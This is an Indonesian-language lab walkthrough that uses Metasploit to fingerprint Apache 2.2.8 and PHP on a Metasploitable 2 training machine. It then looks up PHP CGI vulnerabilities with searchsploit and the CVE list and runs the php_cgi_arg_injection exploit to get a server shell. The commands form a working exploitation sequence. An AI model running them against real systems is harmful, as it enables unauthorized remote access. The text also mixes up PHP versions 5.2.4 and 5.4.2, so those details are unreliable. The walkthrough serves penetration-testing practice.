- Buka halaman web yang ada di server metasploitable 2 melalui browser dengan url
http://IP_Metasploitable2
- Buka msfconsole di terminal
msfconsole
- Gunakan modul
auxiliary/scanner/http/http_version
untuk mengetahui web server yang digunakan di server
use auxiliary/scanner/http/http_version
- Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini semua parameter wajib sudah terisi secara default kecuali parameter
RHOSTS
show options
- Isi parameter
RHOST
dengan IP metasploitable2
set RHOST <IP_metasploitable2>
- Jalankan modul tersebut. Setelah dijalankan didapat informasi bahwa web server yang digunakan adalah apache versi
2.2.8
dan menggunakan PHP versi5.2.4
run
- Gunakan tool
searchploit
untuk mencari celah keamanan dari apache versi2.2.8
dan filter berdasarkan keywordphp
. Disini terdapat informasi bahwa kelamahan PHP versi5.4.2
adalahcgi-bin Remote Code
searchsploit apache 2.2.8 | grep php
- Buka website CVE https://cve.mitre.org/ dan pilih menu Search CVE List
- Ketikkan di kolom pencarian
php 5.4.2
lalu tekan submit
- Dari hasil pencarian juga didapat informasi bahwa php 5.4.2 rentan dengan CGI script
- Buka kembali tool metasploit dan lakukan pencarian modul exploit untuk php 5.4.2
search php 5.4.2
-gunakan modul exploit/multi/http/php_cgi_arg_injection
yang terdapat di list nomor 1
use <nomor_modul>
- Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini kita hanya perlu mengisi parameter
RHOSTS
saja
show options
- Isi parameter
RHOST
dengan IP metasploitable2
set RHOST <IP_metasploitable2>
- Jalankan modul tersebut
exploit
- Setelah dijalankan kita berhasil masuk ke shell server